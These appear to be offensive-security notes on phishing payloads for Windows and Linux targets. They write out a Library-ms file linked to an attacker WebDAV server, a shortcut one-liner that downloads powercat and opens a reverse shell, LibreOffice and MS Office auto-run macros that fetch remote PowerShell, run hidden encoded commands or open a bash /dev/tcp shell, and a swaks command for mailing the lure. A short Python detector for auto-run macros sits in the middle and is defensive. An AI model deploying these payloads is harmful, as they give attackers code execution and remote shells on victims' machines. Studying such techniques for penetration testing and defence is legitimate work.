config.Library-ms + WebDav + ShortCut
- The victim opens config.Library-ms
- It connects to the Kali WebDAV server
- The script in the shortcut file placed in the web root is executed
config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://KaliIP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
WebDav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /path/to/directory
ShortCut
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<MyIP>:8000/powercat.ps1'); powercat -c <MyIP> -p 443 -e "powershell"

LibreOffice Macro
Windows
Sub Main
Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://$IP/exploit.ps1')")
End Sub
Linux
Sub Main
Shell("bash -c 'bash -i >&/dev/tcp/$IP/$PORT 0>&1'")
End Sub

MS Office Macro
ThisWorkbook / ThisDocument module
Sub Workbook_Open() / Document_Open()
MyMacro
End Sub
- Excel: Workbook_Open()
- Word: Document_Open()
Standard module
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "cmd /c powershell /nop -w hidden /enc B64_Encoded"
Str = Str + "B64_Encoded"
<SNIP>
Str = Str + "B64_Encoded"
CreateObject("Wscript.Shell").Run Str, 0, True
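End Sub
- MyMacro is called from both the ThisWorkbook module and the standard module. Including only one of them also works.
- Depending on the environment, only one of them may be triggered, so both are included to be safe.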
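
A defender-side check for the trigger layout described above, as an added example that is not part of the original notes: given VBA module source already extracted from a document (for instance with olevba), it follows calls from the auto-run Subs to any helper that launches a process. The function name, the sample modules and the regex-based parsing are assumptions made for this illustration.

```python
import re

# Auto-run entry points named in the notes above (lower-cased for matching).
AUTO_EXEC = {"workbook_open", "document_open", "auto_open"}
# Process-launch calls used by the macros above: Shell(...) and WScript.Shell.
SINK = re.compile(r'\bShell\s*\(|CreateObject\s*\(\s*"WScript\.Shell"', re.I)
SUB = re.compile(
    r'^[ \t]*(?:(?:Public|Private)[ \t]+)?Sub[ \t]+(\w+)[^\n]*\n(.*?)^[ \t]*End[ \t]+Sub',
    re.I | re.M | re.S)

def autoexec_chains(modules):
    """modules: {module name: VBA source}. Returns call chains that start at an
    auto-run Sub and reach a process-launch call, following helper Subs."""
    subs = [(m, n, b) for m, src in modules.items() for n, b in SUB.findall(src)]
    by_name = {n.lower(): (m, n, b) for m, n, b in subs}

    def walk(sub, chain):
        module, name, body = sub
        chain = chain + [f"{module}.{name}"]
        if SINK.search(body):
            return chain
        for word in re.findall(r"\w+", body):
            callee = by_name.get(word.lower())
            # Skip Subs already on the chain so recursive macros terminate.
            if callee and f"{callee[0]}.{callee[1]}" not in chain:
                found = walk(callee, chain)
                if found:
                    return found
        return None

    chains = []
    for sub in subs:
        if sub[1].lower() in AUTO_EXEC:
            chain = walk(sub, [])
            if chain:
                chains.append(" -> ".join(chain))
    return chains

# Constructed sample mirroring the layout above; the payload is a placeholder.
SAMPLE = {
    "ThisWorkbook": 'Sub Workbook_Open()\nMyMacro\nEnd Sub\n',
    "Module1": ('Sub Auto_Open()\nMyMacro\nEnd Sub\n'
                'Sub MyMacro()\nDim Str As String\n'
                'Str = Str + "cmd /c powershell /nop -w hidden /enc B64_Encoded"\n'
                'CreateObject("Wscript.Shell").Run Str, 0, True\nEnd Sub\n'),
}

if __name__ == "__main__":
    for chain in autoexec_chains(SAMPLE):
        print("auto-run macro reaches process launch:", chain)
```

Both triggers are reported because each one reaches the same helper, which is why matching only on the trigger Sub's own body would miss this layout.
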

Swaks (Send Mail)
sudo swaks -t $receiver@example.com --from $sender@example.com --attach @attach_file_name --server $MailServerIP --body @body_file_name --header "Subject: DoesNotMatter" --suppress-data [-ap]
- -ap: auth password; specifies the SMTP authentication password
- --suppress-data: omits the DATA section (email body/headers) from the terminal output